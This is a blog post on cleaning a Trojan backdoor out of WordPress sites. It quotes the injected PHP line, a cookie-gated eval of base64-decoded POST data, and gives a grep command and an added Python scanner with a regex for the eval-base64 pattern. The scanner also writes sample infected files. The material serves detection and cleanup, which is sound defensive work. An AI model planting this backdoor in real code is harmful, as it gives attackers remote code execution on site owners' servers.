Goodbye Horses
So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed. When visiting an infected site, most folks are being prompted to download:
Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.
So how do you find out if your install has been hit? Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php:
```php
<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>
```

If you see that floating around, get rid of it! Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.
Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:
```sh
grep -R 0bdcf3981272c15a /home/user/example.com/*
```

Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed. Give that command a few minutes to run and you should get a path of where that code snippet can be found. All you have to do at that point is purge it and clear any cache you might have on your WP install.
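The grep above only catches this one sample, because it keys on the cookie name. The same backdoor idea (a request parameter handed straight to eval() after base64_decode()) shows up under other cookie names and with extra whitespace, so a slightly broader check is worth having. Below is an added example of such a scanner, written here in Python rather than taken from the post or from any WordPress tool. It walks a document root, flags files containing the post's cookie indicator, and also flags the generic eval-of-base64-decoded-superglobal pattern; the sample install it scans is constructed inline (the infected index.php is the snippet quoted above, written as inert text; the plugin file is a made-up variant with a different parameter name).

```python
"""Scan a WordPress document root for the eval/base64 backdoor described above.

Added example, not the post author's code. It assumes a directory tree of
PHP files; the sample tree built below is constructed for illustration only.
"""
import os
import re
import tempfile
from pathlib import Path

# Indicator taken from the post: the cookie name the backdoor checks.
COOKIE_INDICATOR = "0bdcf3981272c15a"

# Generic pattern for the same backdoor family: eval() applied to
# base64_decode() of a request superglobal, tolerant of extra whitespace.
EVAL_B64_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|COOKIE|REQUEST)\b",
    re.IGNORECASE,
)


def scan_file(path: Path) -> list[str]:
    """Return the names of the indicators that matched in one file."""
    hits = []
    try:
        data = path.read_bytes()
    except OSError:
        return hits  # unreadable file: nothing to report
    if COOKIE_INDICATOR.encode() in data:
        hits.append("cookie-indicator")
    if EVAL_B64_RE.search(data):
        hits.append("eval-base64-request")
    return hits


def scan_tree(root: Path, suffixes=(".php", ".inc", ".phtml")) -> dict[str, list[str]]:
    """Walk root recursively; map relative path -> matched indicators for flagged files."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix.lower() not in suffixes:
                continue
            hits = scan_file(p)
            if hits:
                findings[str(p.relative_to(root))] = hits
    return findings


def build_sample_tree() -> Path:
    """Constructed sample install: the infected index.php from the post (as text),
    a hypothetical plugin file with a spaced-out variant, and one clean file."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    (root / "wp-content" / "plugins" / "foo").mkdir(parents=True)
    (root / "index.php").write_text(
        "<?php if(md5($_COOKIE['0bdcf3981272c15a'])==\"23c8932280dcafe25c20c6d25c9c8660\")"
        "{ eval(base64_decode($_POST['file'])); exit; } ?>\n"
        "<?php require 'wp-blog-header.php';\n"
    )
    (root / "wp-content" / "plugins" / "foo" / "foo.php").write_text(
        "<?php\n// constructed variant: different parameter, extra whitespace\n"
        "if (isset($_REQUEST['x'])) { eval ( base64_decode ( $_REQUEST['x'] ) ); }\n"
    )
    (root / "wp-config-sample.php").write_text(
        "<?php define('DB_NAME', 'database_name_here');\n"
    )
    return root


if __name__ == "__main__":
    # Point scan_tree() at a real document root instead of the sample to use it.
    for rel_path, hits in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel_path}: {', '.join(hits)}")
```

Running it on the sample reports index.php under both indicators and the plugin file under the generic one only, while the clean file is silent. Treat a hit on the generic pattern as something to read, not to delete blindly: a few legitimate plugins do odd things with eval(), so confirm what the decoded input does before purging the file, and clear any page cache afterwards as the post says.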
Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.
All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.